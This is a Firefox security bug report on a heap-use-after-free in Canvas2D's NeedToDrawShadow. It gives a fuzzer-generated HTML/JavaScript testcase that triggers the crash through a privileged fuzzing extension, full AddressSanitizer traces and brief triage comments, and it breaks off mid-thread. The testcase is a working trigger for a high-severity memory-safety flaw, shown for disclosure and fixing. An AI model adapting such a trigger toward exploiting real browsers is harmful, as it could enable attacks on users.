Closed Bug 1379885 Opened 7 years ago Closed 7 years ago

heap-use-after-free in NeedToDrawShadow

Categories

(Core :: Graphics: Canvas2D, defect)

54 Branch
defect
Not set
normal

Tracking


RESOLVED WORKSFORME
Tracking Status
firefox-esr52 55+ fixed
firefox54 --- wontfix
firefox55 + wontfix
firefox56 + fixed
firefox57 + fixed

People

(Reporter: nils, Unassigned)

Details

(Keywords: csectype-uaf, sec-high, Whiteboard: [fixed by bug 1371259?][adv-main56-])

Attachments

(2 files)

The following testcase crashes the latest ASAN build of Firefox release 54.0.2 (BuildID=20170629230646). The testcase requires the fuzzPriv extension.

<script>
function spin() {
	var x=new XMLHttpRequest();
	x.open("POST","https://mozilla.org",false);
	try{x.send("X");}catch(e){}
}

function start() {
	o1=window.open('data:text/html,<div>','p0','width=7');
	o1.onload=fun0;
	o2=window.open('data:text/html,<div>','p1','width=4023');
	o2.onload=fun1;
}
function fun0 (e) {
	o7=e.target;
	o1.onresize=fun2;
}
function fun1() {
	o54=o7.querySelector('*:not([id])');
	o1.resizeTo(30,242);
	document.documentElement.appendChild(o54);
	spin();
	o1.close();
	o1.fuzzPriv.callDrawWindow(0);
}
function fun2() {
	o1.onresize=function(){};
	o1.resizeBy(-2,15);
	spin();
	o1.onresize=fun3;
	o1.resizeBy(15,13);
}
function fun3() {
	spin();
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==15542==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a00029d170 at pc 0x7fdea09738fd bp 0x7ffcbaacac40 sp 0x7ffcbaacac38
READ of size 8 at 0x61a00029d170 thread T0
    #0 0x7fdea09738fc in Length /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:397:37
    #1 0x7fdea09738fc in CurrentState /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CanvasRenderingContext2D.h:1128
    #2 0x7fdea09738fc in NeedToDrawShadow /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CanvasRenderingContext2D.h:876
    #3 0x7fdea09738fc in mozilla::dom::CanvasRenderingContext2D::UsedOperation() /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CanvasRenderingContext2D.h:914
    #4 0x7fdea0995d2f in mozilla::dom::CanvasRenderingContext2D::DrawWindow(nsGlobalWindow&, double, double, double, double, nsAString_internal const&, unsigned int, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:5419:22
    #5 0x7fde9fcc2a00 in mozilla::dom::CanvasRenderingContext2DBinding::drawWindow(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:2308:3
    #6 0x7fdea08a1677 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #7 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #8 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #9 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #10 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
    #11 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #12 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #13 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #14 0x7fdea6b75423 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #15 0x7fde9db5d399 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #16 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #17 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #18 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #19 0x7fdea6e1ef2c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #20 0x7fdea6dd5b5e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
    #21 0x7fdea6dfe9e9 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
    #22 0x7fdea6e01314 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #23 0x7fdea61b2047 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #24 0x7fdea61b2047 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #25 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #26 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
    #27 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #28 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #29 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #30 0x7fdea6e1ef2c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #31 0x7fdea6dd5b5e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
    #32 0x7fdea6dfe9e9 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
    #33 0x7fdea6e01314 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #34 0x7fdea61b2047 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #35 0x7fdea61b2047 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #36 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #37 0x7fdea6b771dc in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #38 0x7fdea02e42c4 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #39 0x7fdea0cd1bea in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #40 0x7fdea0cd1bea in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #41 0x7fdea0c9cde0 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:16
    #42 0x7fdea0c9ed89 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #43 0x7fdea0c89203 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
    #44 0x7fdea0c8cb72 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #45 0x7fdea2e391fc in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1058:7
    #46 0x7fdea520af32 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7646:5
    #47 0x7fdea5206e54 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7440:7
    #48 0x7fdea520e53f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7337:13
    #49 0x7fde9de0e530 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
    #50 0x7fde9de0d4c8 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:5
    #51 0x7fde9de0a226 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
    #52 0x7fde9de0c324 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #53 0x7fde9de0cedc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #54 0x7fde9c66c36a in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:634:18
    #55 0x7fde9ee500bb in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8840:7
    #56 0x7fde9ee4fbdc in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8766:9
    #57 0x7fde9ee25553 in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5296:3
    #58 0x7fde9eef6592 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #59 0x7fde9eef6592 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #60 0x7fde9eef6592 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #61 0x7fde9c4bec71 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #62 0x7fde9c4bb8c0 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #63 0x7fde9d2a32cf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #64 0x7fde9d215cb8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #65 0x7fde9d215cb8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #66 0x7fde9d215cb8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #67 0x7fdea260eecf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #68 0x7fdea5b65571 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #69 0x7fdea5d33069 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4499:10
    #70 0x7fdea5d34cd5 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4677:8
    #71 0x7fdea5d3602c in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4768:16
    #72 0x4dffaf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:10
    #73 0x4dffaf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307
    #74 0x7fdeb7d4a82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #75 0x41c3d8 in _start (/home/nils/fuzzer3/rel/firefox/firefox+0x41c3d8)

0x61a00029d170 is located 240 bytes inside of 1168-byte region [0x61a00029d080,0x61a00029d510)
freed by thread T0 here:
    #0 0x4b2b2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fde9c35e644 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
    #2 0x7fde9c35e236 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7fde9c36569e in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3836:3
    #4 0x7fde9c364b50 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3661:9
    #5 0x7fde9c3680ec in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4154:3
    #6 0x7fde9ef34fdf in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1451:3
    #7 0x7fde9ea9c20d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
    #8 0x7fde9c4d9cb1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #9 0x7fde9dc27e77 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #10 0x7fde9dc27e77 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #11 0x7fde9dc27e77 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #12 0x7fde9dc2f42d in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
    #13 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #14 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #15 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #16 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
    #17 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #18 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #19 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #20 0x7fdea6b75423 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #21 0x7fde9db5d399 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #23 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #24 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #25 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
    #26 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #27 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #28 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #29 0x7fdea6e1ef2c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7fdea6dd5b5e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
    #31 0x7fdea6dfe9e9 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
    #32 0x7fdea6e01314 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #33 0x7fdea61b2047 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #34 0x7fdea61b2047 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #35 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #36 0x7fdea6b771dc in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12

previously allocated by thread T0 here:
    #0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e11bd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fdea09a3858 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7fdea09a3858 in mozilla::dom::CanvasRenderingContextHelper::CreateContextHelper(mozilla::dom::CanvasContextType, mozilla::layers::LayersBackend) /home/worker/workspace/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:142
    #4 0x7fdea0eaf395 in mozilla::dom::HTMLCanvasElement::CreateContext(mozilla::dom::CanvasContextType) /home/worker/workspace/build/src/dom/html/HTMLCanvasElement.cpp:420:5
    #5 0x7fdea0eaf724 in non-virtual thunk to mozilla::dom::HTMLCanvasElement::CreateContext(mozilla::dom::CanvasContextType) /home/worker/workspace/build/src/dom/html/HTMLCanvasElement.cpp:416:20
    #6 0x7fdea09a3f0c in mozilla::dom::CanvasRenderingContextHelper::GetContext(JSContext*, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:186:15
    #7 0x7fdea0eb5f14 in mozilla::dom::HTMLCanvasElement::GetContext(JSContext*, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/HTMLCanvasElement.cpp:972:10
    #8 0x7fdea055d5af in mozilla::dom::HTMLCanvasElementBinding::getContext(JSContext*, JS::Handle<JSObject*>, mozilla::dom::HTMLCanvasElement*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLCanvasElementBinding.cpp:242:43
    #9 0x7fdea08a1677 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #10 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #11 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #12 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #13 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
    #14 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #15 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #16 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #17 0x7fdea6b75423 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #18 0x7fde9db5d399 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #19 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #20 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #21 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #22 0x7fdea6e1ef2c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #23 0x7fdea6dd5b5e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
    #24 0x7fdea6dfe9e9 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
    #25 0x7fdea6e01314 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #26 0x7fdea61b2047 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #27 0x7fdea61b2047 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #28 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #29 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
    #30 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #31 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #32 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #33 0x7fdea6e1ef2c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #34 0x7fdea6dd5b5e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
    #35 0x7fdea6dfe9e9 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:397:37 in Length
Shadow bytes around the buggy address:
  0x0c348004b9d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348004b9e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348004b9f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c348004ba00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c348004ba10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c348004ba20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd
  0x0c348004ba30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348004ba40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348004ba50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348004ba60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348004ba70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15542==ABORTING
Attached file ASAN output
Markus, maybe you can take a look?
Group: core-security → gfx-core-security
Flags: needinfo?(mstange)
Flags: sec-bounty?
tracking as sec-high
(In reply to Nils from comment #0)
> The testcase requires the fuzzPriv extension.

